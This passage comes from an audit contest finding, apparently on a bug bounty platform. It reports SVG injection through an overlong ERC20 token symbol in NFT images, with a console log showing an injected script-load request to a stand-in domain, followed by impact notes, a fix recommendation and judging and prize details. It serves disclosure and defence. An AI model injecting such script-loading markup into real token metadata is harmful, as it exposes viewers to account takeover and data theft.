In jsFiddle, I paste the SVG image into a blank HTML page and execute it.

https://jsfiddle.net/71vke8t0/

<!DOCTYPE html>

<html>

<body>

</body>

</html>

In the dev tools console, it can be seen that a request was made to aa.aa with attempt to load the script from the external domain (although unsuccessful because the domain does not exist), which means the attack was successful.

GET https://aa.aa/ net::ERR_NAME_NOT_RESOLVED

Impact

A malicious user can create a stream with a controlled by them ERC20 token and thus inject malicious code into websites that work with the respective NFT. When a user opens the respective page, the code will execute, which can lead to a wide range of harms to the user, including but not limited to: account takeover, stolen data, unauthorized actions on behalf of the user, change the NFT image to such of a famous and expensive one and more. High impact, high likelihood.

Tools Used

Manual review

Recommendations

Most symbols of ERC20 tokens are <= 5 characters long. I recommend significantly reducing the maximum allowed length of the symbol from 30 to 5 characters.

Updates

Lead Judging Commences

inallhonesty Lead Judge about 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

SVG Injection

dimah7 Auditor

about 1 year ago

ge6a Submitter

about 1 year ago

inallhonesty Lead Judge

about 1 year ago

inallhonesty Lead Judge about 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

SVG Injection

Prize pool breakdown

Total prize

53,440 USDC

nSLOC

2,655

20 USDC / LOC

High Medium

45,000 USDC

Low

3,100 USDC

Judges

5,340 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.